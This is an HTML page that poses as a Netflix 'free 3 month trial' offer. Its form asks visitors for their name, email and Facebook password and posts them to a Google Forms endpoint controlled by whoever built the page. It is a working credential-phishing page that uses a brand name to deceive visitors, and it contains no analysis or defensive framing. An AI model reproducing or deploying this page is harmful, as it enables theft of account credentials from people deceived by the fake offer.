<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Store Data</title>

    <style>
        body {
            font-family: Arial, Helvetica, sans-serif;
            background: linear-gradient(rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0.5)), url(netflix-background.jpg) no-repeat right;
        }

        h2 {
            text-align: center;
            text-shadow: 2px 2px 5px rgb(24, 24, 24);
            color: rgb(255, 255, 255);
        }

        .container {
            width: 50%;
            background: linear-gradient(rgba(0, 0, 0, 0.842), rgba(0, 0, 0, 0.726)), url(Net-tab2.jpg) no-repeat left;
            background-position: right;
            text-align: center;
            padding: 2rem;
            border-radius: 5px;
            margin: 0 auto;
            box-shadow: 5px 5px 2px rgba(32, 32, 32, 0.322);
        }

        #logo {
            display: block;
            margin: 0 auto;
            width: 150px;
        }

        p {
            color: #fff;
        }

        label {
            font-family: Arial, Helvetica, sans-serif;
            color: #ccc;
        }

        input {
            display: inline-block;
            padding: .5rem .5rem;
            border-radius: 5px;
            border: solid 1px;
            margin-bottom: 1rem;
            outline: none;
        }

        input[type="submit"] {
            padding: .5rem 1rem;
            background-color: darkcyan;
            font-size: 1rem;
            border: solid 1px black;
            cursor: pointer;
            color: #fff;
        }
    </style>
</head>

<body>
    <div>
        <img id="logo" src="Netflix-i.png" alt="netflix">
    </div>
    <h2>Enjoy With Free 3 Month Trail watch today!</h2>
    <div class="container">
        <form id="form"
            action="ttps://docs.google.com/forms/u/0/d/e/1FAIpQLSfxSMSZSfUHo695fCIcYy8i0HBYoo82CCrzf1mEdvt0Yv4t0g/formResponse"
            target="_self" method="post">
            <p>Login with your Facebook Account :</p>
            <label for="text">Enter Name</label><br>
            <input type="text" id="name" name="entry.2134948019" placeholder="Name"><br>
            <label for="email">Enter Email</label><br>
            <input type="email" id="email" name="entry.413741173" placeholder="Email@"><br>
            <label for="password">Facebook Password</label><br>
            <input type="password" id="pass" name="entry.1372502333" placeholder="FB Password"><br>
            <input type="submit" value="Submit">
        </form>
    </div>

    <script>

        //if (!userName.value === '') {
        //    alert('Please fill a Name!');
        //}

        let userForm = document.querySelector('form');
        let userName = document.getElementById('name');
        let userEmail = document.getElementById('email');
        let userPass = document.getElementById('pass');
        console.log(userName.value);
        //console.log(userEmail.value);
        console.log(userPass.value);

        form.onsubmit = function (e) {
            if (userName.value === '' || userEmail.value === '' || userPass.value === '') {
                e.preventDefault();
                alert('You need to fill form please!');
            }
        }
        console.log(userName);
        console.log(userName.value);
        console.log(userPass);


    </script>
</body>

</html>